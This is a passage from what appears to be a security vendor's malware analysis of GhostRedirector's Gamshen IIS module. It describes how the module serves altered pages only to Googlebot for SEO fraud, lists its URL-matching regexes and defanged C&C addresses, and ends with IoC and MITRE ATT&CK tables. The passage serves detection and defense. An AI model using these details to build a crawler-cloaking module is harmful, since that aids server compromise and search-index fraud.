5 - Executing commands on a testing server\" width=\"\" height=\"\"\/><figcaption><em>Figure 5. Executing commands on a testing server<\/em><\/figcaption><\/figure>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Adding a user through the malware on a testing server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-6-adding-a-user-through-the-malware-on-a-testing-server.png\" alt=\"Figure 6 - Adding a user through the malware on a testing server\" width=\"\" height=\"\"\/><figcaption><em>Figure 6. 
Adding a user through the malware on a testing server<\/em><\/figcaption><\/figure>\n<h3>Gamshen, malicious IIS module<\/h3>\n<p>Developed as a C\/C++ DLL, Gamshen is a malicious native IIS module. The main functionality of this malware is to intercept requests made to the compromised server from the Googlebot search engine crawler and only in that case modify the legitimate response of the server. The response is modified based on data requested dynamically from Gamshen\u2019s C&amp;C server. By doing this, GhostRedirector attempts to manipulate the Google search ranking of a specific, third-party website, by using manipulative, shady SEO techniques such as creating artificial backlinks from the legitimate, compromised website to the target website. We previously documented a case of an IIS trojan using similar tactics: see IISerpent: Malware-driven SEO fraud as a service.<\/p>\n<p>It&#8217;s important to mention that a regular user who visits the affected website wouldn\u2019t see any changes and would not be affected by the malicious behavior because Gamshen doesn\u2019t trigger any of its malicious activity on requests from regular visitors.<\/p>\n<p>Figure 7 shows how a malicious module participating in the IIS SEO fraud scheme modifies the legitimate response of a compromised server when a request is made from the Google Crawler, aka Googlebot.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 7. Overview of an SEO fraud scheme\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-7-overview-of-an-seo-fraud-scheme.png\" alt=\"Figure 7 - Overview of an SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 7. 
Overview of an SEO fraud scheme<\/em><\/figcaption><\/figure>\n<p>In order to do this, the attackers have implemented their own malicious code for the following IIS event handlers:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnBeginRequest<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnPreExecuteRequestHandler<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnPostExecuteRequestHandler<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span><\/li>\n<\/ul>\n<p>When the compromised server receives an HTTP request, the request goes through the IIS request processing pipeline, which triggers these handlers in various steps of the process \u2013 notably, the <span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span> handler is triggered just before the HTTP response is sent out by the compromised server. Since Gamshen is installed as an IIS module, it automatically intercepts each incoming HTTP request at these steps, and performs three actions.<\/p>\n<p>First, it performs a series of validations to filter only HTTP requests of interest:<\/p>\n<ul>\n<li>The request must originate from a Google crawler: either the <span style=\"font-family: courier new, courier, monospace;\">User-Agent<\/span> header contains the string <span style=\"font-family: courier new, courier, monospace;\">Googlebot<\/span>, or the <span style=\"font-family: courier new, courier, monospace;\">Referer<\/span> contains the string <span style=\"font-family: courier new, courier, monospace;\">google.com<\/span>.<\/li>\n<li>The HTTP method must not be <span style=\"font-family: courier new, courier, monospace;\">POST<\/span>.<\/li>\n<li>The requested resource is not an image, stylesheet, or similar static resource, i.e., it doesn\u2019t have any of the following extensions: <span style=\"font-family: courier new, courier, 
monospace;\">.jpg<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.resx<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.png<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.jpeg<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.bmp<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.gif<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.ico<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.css<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">.js<\/span>. This is likely to avoid breaking UI functionality.<\/li>\n<li>The URL must contain the string <span style=\"font-family: courier new, courier, monospace;\">android_<\/span> or match any of the following regular expressions:\n<p style=\"margin-top: 1em;\"><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\\\\\/([a-zA-Z0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\\/([0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\\/([a-zA-Z]{8,10})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: 
#00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9]{6,8})\\\\\/([a-zA-Z0-9]{6,8})(\/|\\\\.phtml|\\\\.xhtml|\\\\.phtm|\\\\.shtml)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9_]{14})(\/|\\\\.html|\\\\.htm)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9]{6})\\\\\/([a-zA-Z0-9]{8})(\/|\\\\.html|\\\\.htm)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-z0-9]{6})\\\\.xhtml<\/span><\/p>\n<\/li>\n<\/ul>\n<p>Second, Gamshen modifies the response intended for the search engine crawler with data obtained from its own C&amp;C server, <span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span>. We have observed three URLs being used for this purpose:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/index_base64.php?&lt;original_url&gt;<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/tz_base64.php?&lt;original_url&gt;<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/url\/index_base64.php<\/span><\/li>\n<\/ul>\n<p>In all cases, the following hardcoded <span style=\"font-family: courier new, courier, monospace;\">User-Agent<\/span> string is used: <span style=\"font-family: courier new, courier, monospace;\">Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)<\/span>. 
A base64-encoded response is expected, which is then decoded and injected into the HTTP response intended for the search engine crawler.<\/p>\n<p>Finally, at the last step of the request processing pipeline, just before the HTTP response is sent out \u2013 the <span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span> event handler verifies the response for these crawler requests. If the response has the <span style=\"font-family: courier new, courier, monospace;\">404<\/span> HTTP status code \u2013 i.e., Gamshen had not been able to obtain the malicious data from its C&amp;C server, then it instead performs a redirect to a different C&amp;C server: <span style=\"font-family: courier new, courier, monospace;\">http:\/\/gobr.868id[.]com\/tz.php<\/span>.<\/p>\n<p>We weren\u2019t able to obtain a response from <span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span> or <span style=\"font-family: courier new, courier, monospace;\">gobr.868id[.]com<\/span>, but believe the data supports <a href=\"https:\/\/blog.hubspot.com\/marketing\/black-hat-seo\">shady SEO techniques<\/a> \u2013 such as keyword stuffing, inserting malicious backlinks \u2013 or, in case of the redirection, making the search engine associate the compromised website with the target, third-party website, thus poisoning the search index.<\/p>\n<p>We were, however, able to pivot on those domains on VirusTotal and find related images \u2013 in this case, images advertising a gambling application for Portuguese speaking users. 
We believe this website is the beneficiary of the SEO fraud scheme, facilitated by this malicious IIS module \u2013 Gamshen probably attempts to compromise as many websites as possible and misuse their reputation to drive traffic to this third-party website.<\/p>\n<p>Figure 8 and Figure 9 show two images potentially used by GhostRedirector in its SEO fraud scheme, advertising a gambling application to Portuguese-speaking users.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-8-a-gambling-website-likely-benefiting-from-the-seo-fraud-scheme.png\" alt=\"Figure 8 - A gambling website likely benefiting from the SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)<\/em><\/figcaption><\/figure>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-9-a-gambling-website-likely-benefiting-from-the-seo-fraud-scheme.png\" alt=\"Figure 9 - A gambling website likely benefiting from the SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)<\/em><\/figcaption><\/figure>\n<h2>Conclusion<\/h2>\n<p>In this blogpost, we have presented a previously unknown, China-aligned threat actor, GhostRedirector, and its toolkit for compromising and abusing Windows servers. 
In addition to enabling remote command execution on the compromised servers, GhostRedirector also deploys a malicious IIS module, Gamshen, designed to manipulate Google search results through shady SEO tactics. Gamshen abuses the credibility of the websites hosted on the compromised server to promote a third-party, gambling website \u2013 potentially a paying client participating in an SEO fraud as-a-service scheme.<\/p>\n<p>GhostRedirector also demonstrates persistence and operational resilience by deploying multiple remote access tools on the compromised server, on top of creating rogue user accounts, all to maintain long-term access to the compromised infrastructure.<\/p>\n<blockquote>\n<p><em>Mitigation recommendations can be found in our comprehensive <a href=\"https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf\" target=\"_blank\" rel=\"noopener\">white paper<\/a>. For any inquiries, or to make sample submissions related to the subject, contact us at threatintel@eset.com.<\/em><\/p>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A comprehensive list of indicators of compromise (IoCs) and samples can be found in <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/GhostRedirector\" target=\"_blank\" rel=\"noopener\">our GitHub repository<\/a>.<\/p>\n<h3>Files<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"132\"><strong>Filename<\/strong><\/td>\n<td width=\"151\"><strong>Detection<\/strong><\/td>\n<td width=\"180\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">EE22BA5453ED577F8664<wbr\/>CA390EB311D067E47786<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">SitePut.exe<\/span><\/td>\n<td width=\"151\">MSIL\/Agent.FEZ<\/td>\n<td width=\"180\">Zunput, information 
collector and webshell installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">677B3F9D780BE184528D<wbr\/>E5967936693584D9769A<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">EfsNetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/HackTool.Agent<wbr\/>.QJ<\/td>\n<td width=\"180\">A custom tool using the EfsPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5D4D7C96A9E302053BDF<wbr\/>AF2449F9A2AB3C806E63<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">A custom tool using the BadPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC62<wbr\/>15DDAC8E56EACBB29B69<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">miniscreen.dll<\/span><\/td>\n<td width=\"151\">Win64\/Agent.ELA<\/td>\n<td width=\"180\">Rungan, a passive C++ backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371818BDC20669DF3CA4<wbr\/>4BE758200872D583A3B8<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">auto.exe<\/span><\/td>\n<td width=\"151\">Generik.KJWBIPC<\/td>\n<td width=\"180\">A tool to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">9DD282184DDFA796204C<wbr\/>1D90A46CAA117F46C8E1<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">auto_sign.exe<\/span><\/td>\n<td width=\"151\">MSIL\/Agent.XQL<\/td>\n<td width=\"180\">A tool to create a 
new user or deploy webshells on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">87F354EAA1A6ED5AE51C<wbr\/>4B1A1A801B6CF818DAFC<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">EfsNetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/HackTool.Agent<wbr\/>.QJ<\/td>\n<td width=\"180\">A custom tool using the EfsPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5A01981D3F31AF47614E<wbr\/>51E6C216BED70D921D60<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">DotNet4.5.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">A custom tool using the BadPotato exploit to elevate the privileges of an existing user.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">6EBD7498FC3B744CED37<wbr\/>1C379BA537077DD97036<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NetAUtoUser_sign<wbr\/>.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">A custom tool using the BadPotato exploit to elevate the privileges of an existing user.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">0EE926E29874324E52DE<wbr\/>816B74B12069529BB556<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span><\/td>\n<td width=\"151\">Win64\/RemoteAdmin.<wbr\/>GotoHTTP. 
<wbr\/>A potentially<wbr\/> unsafe application<\/td>\n<td width=\"180\">GoToHTTP tool.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">373BD3CED51E19E88876<wbr\/>B80225ECA65A5C01413F<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">PHP\/Webshell.NWE<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5CFFC4B3B96256A45FB4<wbr\/>5056AE0A9DC76329C25A<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.MP<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">B017CEE02D74C92B2C65<wbr\/>517101DC72AFA7D18F16<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">PHP\/Webshell.OHB<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A8EE056799BFEB709C08<wbr\/>D0E41D9511CED5B1F19D<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UV<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">C4681F768622BD613CBF<wbr\/>46B218CDA06F87559825<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.KU<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">E69E4E5822A81F68107B<wbr\/>933B7653C487D055C51B<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UZ<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A3A55E4C1373E8287E4E<wbr\/>4D5D3350AC665E1411A7<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UY<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span 
style=\"font-family: courier new, courier, monospace;\">E6E4634CE5AFDA0688E7<wbr\/>3A2C21A2ECDABD5E155D<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UY<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5DFC2D0858DD7E811CD1<wbr\/>9938B8C28468BE494CB6<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UX<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">08AB5CC8618FA593D2DF<wbr\/>91900067DB464DC72B3E<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ManagedEngine32<wbr\/>_v2.dll<\/span><\/td>\n<td width=\"151\">Win32\/BadIIS.AG<\/td>\n<td width=\"180\">Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">871A4DF66A8BAC3E640B<wbr\/>2D1C0AFC075BB3761954<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ManagedEngine64<wbr\/>_v2.dll<\/span><\/td>\n<td width=\"151\">Win64\/BadIIS.CY<\/td>\n<td width=\"180\">Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756<wbr\/>562ED73375082192F5A8<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">MSIL\/Agent.FFZ<\/td>\n<td width=\"180\">Comdai, a malicious multipurpose DLL used to create a malicious user.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"142\"><strong>Domain<\/strong><\/td>\n<td width=\"113\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td 
width=\"151\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">xzs.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201112\u201103<\/td>\n<td width=\"151\">GhostRedirector staging server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">104.233.192[.]1<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">xz.868id[.]com<\/span><\/td>\n<td width=\"113\">PEG TECH INC<\/td>\n<td width=\"85\">2024\u201112\u201103<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">104.233.210[.]229<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">q.822th[.]com<\/span><br \/><span style=\"font-family: courier new, courier, monospace;\">www.881vn[.]com<\/span><\/td>\n<td width=\"113\">PEG TECH INC<\/td>\n<td width=\"85\">2023\u201110\u201106<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">gobr.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201108\u201125<\/td>\n<td width=\"151\">Gamshen C&amp;C server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201108\u201125<\/td>\n<td width=\"151\">Gamshen C&amp;C server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">43.228.126[.]4<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: 
courier new, courier, monospace;\">www.cs01[.]shop<\/span><\/td>\n<td width=\"113\">XIMBO Internet Limited<\/td>\n<td width=\"85\">2024\u201104\u201101<\/td>\n<td width=\"151\">Comdai C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">103.251.112[.]11<\/span><\/td>\n<td width=\"142\">N\/A<\/td>\n<td width=\"113\">IRT\u2011HK\u2011ANS<\/td>\n<td width=\"85\">N\/A<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<table style=\"height: 1370px;\" border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr style=\"height: 18px;\">\n<td style=\"height: 18px;\" width=\"113\"><strong>Tactic<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"113\"><strong>ID<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"151\"><strong>Name<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr style=\"height: 72px;\">\n<td style=\"height: 396px;\" rowspan=\"8\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/002\" target=\"_blank\" rel=\"noopener\">T1588.002<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Obtain Capabilities: Tool<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector uses <a href=\"https:\/\/www.eziriz.com\/dotnet_reactor.htm\" target=\"_blank\" rel=\"noopener\">.NET Reactor<\/a> to obfuscate its tools, and used EfsPotato and BadPotato to develop custom privilege escalation tools.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1587\/001\" 
target=\"_blank\" rel=\"noopener\">T1587.001<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Develop Capabilities: Malware<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector develops its own malware<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/006\" target=\"_blank\" rel=\"noopener\">T1608.006<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Stage Capabilities: SEO Poisoning<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses SEO poisoning to manipulate search results and drive traffic to a third-party website.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/001\" target=\"_blank\" rel=\"noopener\">T1583.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses malicious domains for hosting payloads and for its C&amp;C servers.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/004\" target=\"_blank\" rel=\"noopener\">T1583.004<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Acquire Infrastructure: Server<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector leverages Cloudflare on its infrastructure.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/001\" target=\"_blank\" rel=\"noopener\">T1608.001<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Stage Capabilities: Upload Malware<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector has staged Rungan and Gamshen on attacker-controlled servers.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td 
style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/002\" target=\"_blank\" rel=\"noopener\">T1608.002<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Stage Capabilities: Upload Tool<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector has staged various malicious and legitimate tools on attacker-controlled servers.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/003\" target=\"_blank\" rel=\"noopener\">T1588.003<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obtain Capabilities: Code Signing Certificates<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector obtained a certificate for signing its tools, like those for privilege escalation.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><strong>Initial Access<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1190\" target=\"_blank\" rel=\"noopener\">T1190<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Exploit Public-Facing Application<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector exploits an unknown SQL injection vulnerability on the victim\u2019s server.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 234px;\" rowspan=\"4\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1106\" target=\"_blank\" rel=\"noopener\">T1106<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Native API<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector may use APIs such as <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/http\/nf-http-httpinitialize\" target=\"_blank\" rel=\"noopener\">HttpInitialize<\/a> and <a 
href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/desktop\/api\/Http\/nf-http-httpaddurl\" target=\"_blank\" rel=\"noopener\">HttpAddUrl<\/a> for registering a URL.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses PowerShell interpreter to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/003\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Command and Scripting Interpreter: Windows Command Shell<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector can execute <span style=\"font-family: courier new, courier, 